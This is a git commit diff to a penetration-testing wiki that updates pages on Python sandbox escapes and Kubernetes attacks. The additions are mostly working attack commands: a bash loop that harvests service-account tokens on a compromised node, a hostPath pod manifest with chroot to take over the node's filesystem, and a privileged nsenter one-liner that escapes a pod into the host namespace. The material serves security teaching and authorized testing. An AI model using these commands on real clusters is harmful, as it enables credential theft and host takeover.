GitBook: [#2911] No subject

This commit is contained in:
CPol 2021-12-23 12:20:46 +00:00 committed by gitbook-bot
parent 086406e0d1
commit 8a0c6374c5
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
5 changed files with 98 additions and 36 deletions

View file

@ -830,31 +830,7 @@ f(42)
## Decompiling Compiled Python
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code.
**Check out this tutorial**:
{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
{% endcontent-ref %}
## Misc Python
### Assert
Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\
Therefore, checks like
```python
def check_permission(super_user):
try:
assert(super_user)
print("\nYou are a super user\n")
except AssertionError:
print(f"\nNot a Super User!!!\n")
```
will be bypassed 
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code
## References
@ -863,4 +839,3 @@ will be bypassed 
* [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/)
* [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python\_sandbox\_escape)
* [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html)
* [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)

View file

@ -48,3 +48,7 @@ Another important details about enumeration and Kubernetes permissions abuse is
[hardening-roles-clusterroles.md](hardening-roles-clusterroles.md)
{% endcontent-ref %}
## Labs to practice and learn
* [https://securekubernetes.com/](https://securekubernetes.com)
* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html)

View file

@ -20,14 +20,6 @@ You can check this **docker breakouts to try to escape** from a pod you have com
[docker-breakout](../../linux-unix/privilege-escalation/docker-breakout/)
{% endcontent-ref %}
If you managed to escape from the container there are some interesting things you will find in the node:
* The **Kubelet** service listening
* The **Kube-Proxy** service listening
* The **Container Runtime** process (Docker)
* More **pods/containers** running in the node you can abuse like this one (more tokens)
* The whole **filesystem** and **OS** in general
### Abusing Kubernetes Privileges
As explained in the section about **kubernetes enumeration**:
@ -94,3 +86,34 @@ In case the **compromised pod is running some sensitive service** where other po
## Automatic Tools
* [https://github.com/inguardians/peirates](https://github.com/inguardians/peirates)
## Node Post-Exploitation
If you managed to **escape from the container** there are some interesting things you will find in the node:
* The **Container Runtime** process (Docker)
* More **pods/containers** running in the node you can abuse like this one (more tokens)
* The whole **filesystem** and **OS** in general
* The **Kube-Proxy** service listening
* The **Kubelet** service listening: Check `/var/lib/kubelet/` specially `/var/lib/kubelet/kubeconfig`
```bash
# Check Kubelet privileges
kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system
# Steal the tokens from the pods running in the node
## The most interesting one is probably the one of kube-system
ALREADY="IinItialVaaluE"
for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
ALREADY="$ALREADY|$TOKEN"
echo "Directory: $i"
echo "Namespace: $(cat $i)"
echo ""
echo $TOKEN
echo "================================================================================"
echo ""
fi
done
```

View file

@ -377,7 +377,15 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1bet
{% endtab %}
{% endtabs %}
****
### **Get Pods consumptions**
{% tabs %}
{% tab title="kubectl" %}
```
./kubectl top pod --all-namespaces
```
{% endtab %}
{% endtabs %}
### Escaping from the pod

View file

@ -91,7 +91,7 @@ So just create the malicious pod and expect the secrets in port 6666:
![](<../../.gitbook/assets/image (464).png>)
### **Pod Creation - Mount Root (pod escape)**
### **Pod Creation & Escape - Mount Root**
Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one:
@ -125,6 +125,58 @@ kubectl --token $token create -f mount_root.yaml
And capturing the reverse shell you can find the `/` directory (the entire filesystem) of the node mounted in `/mnt` inside the pod.
**Instead of getting a reverse shell you might just wanto to execute a pod using kubectl with the filesystem mounted and get a shell on it:**
1. Create a "hostpath volume mount" `pod` manifest.
```
cat > hostpath.yml <<EOF
---
apiVersion: v1
kind: Pod
metadata:
name: hostpath
spec:
containers:
- name: hostpath
image: busybox:latest
command:
- sleep
- "86400"
volumeMounts:
- name: rootfs
mountPath: /rootfs
restartPolicy: Always
volumes:
- name: rootfs
hostPath:
path: /
EOF
```
2. Create the `pod` that mounts the host filesystem's `/` at `/rootfs` inside the container.
```
kubectl apply -f hostpath.yml
```
3. Use `kubectl exec` to get a shell inside the `hostpath` `pod` in the `default` `namespace`.
```
kubectl exec -it hostpath /bin/sh
```
4. Use the `chroot` command to switch the filesystem root to the `/rootfs` of the container and run a `bash` shell.
```
chroot /rootfs /bin/bash
```
### Pod Creation & Escape - Get into root pid ns
From [this tweet](https://twitter.com/mauilion/status/1129468485480751104) you can find a way to escape from the pod and get inside the root ns
```bash
kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
```
### Sniffing **with a sidecar proxy app**
By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.